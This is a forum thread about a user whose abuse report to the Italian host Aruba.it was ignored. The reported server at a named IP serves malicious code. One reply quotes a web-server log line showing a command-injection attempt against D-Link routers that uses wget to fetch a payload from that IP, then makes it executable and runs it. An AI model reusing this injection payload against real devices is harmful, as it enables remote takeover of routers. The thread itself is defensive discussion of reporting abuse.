
Aruba.it blind to malicious code hosting - maxhq
I tried to notify aruba.it of someone obviously hosting malicious code and trying to attack web servers:
http:&#x2F;&#x2F;80.211.112.150&#x2F;k<p>(Reverse DNS resolves to their domain)<p>Their reaction?
1. in the chat they redirect me to dedicated hosting support form („only way to do it“)
2. Dedicated hosting support just closes my ticket.<p>Wow!
======
cs02rm0
I got this too (amongst other hosts).

nginx_1 | 197.39.15.48 - - [30/Aug/2018:14:51:22 +0000] "GET
/login.cgi?cli=aa%20aa%27;wget%20[http://80.211.112.150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks...](http://80.211.112.150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$)
HTTP/1.1" 400 173 "-" "LMAO/2.0" "-"

Apparently targeting dlink routers -
[https://twitter.com/txalin/status/1007625620090707974?lang=e...](https://twitter.com/txalin/status/1007625620090707974?lang=en)

------
HelloNurse
You are dealing with customer support for some Aruba customer, i.e. not you.
Why don't you contact police or the site owner instead?

If it's a hacked server, the owner has to notice the hack and ask for help
cleaning up if necessary. You have no authority whatsoever, and if you attempt
to stir up trouble about someone's web site, closing tickets is at the polite
end of the response spectrum. You risk prosecution.

If it's a brazen criminal using their own host, they are the customer and the
site is working as expected. No customer support required.

~~~
maxhq
Errr... reading your points I presume you've never really done that (notifying
a service provider).

> Why don't you contact police or the site owner instead?

Police? Seriously? My police here in germany or the italian police? What do
you think will happen? Right: nothing. Site owner? If you can tell me the site
owner from an IP... I will do that.

> You risk prosecution.

By telling a service provider that they host malicious content and should do
sth. about it? Now that's an interesting view.

> If it's a brazen criminal using their own host [...] No customer support
> required.

The customer support was the only way to contact the provider. It doesn't
matter if they are housing or hosting malicious content. They are at least
partly responsible, especially if someone is telling them.

~~~
HelloNurse
You are trying to intimidate a provider into messing with someone else's site,
which amounts to hacking or worse.

------
hotpotjunkie
There's basically nothing you can do besides notify their abuse desk and
probably get ignored, because abuse desks pay little attention to one-off
complaints like that. If they do get taken down, it'll be by one of the larger
security companies who detect the page (for example, if that IP sends spam)
and includes it in their feed of bad IP's to aruba.

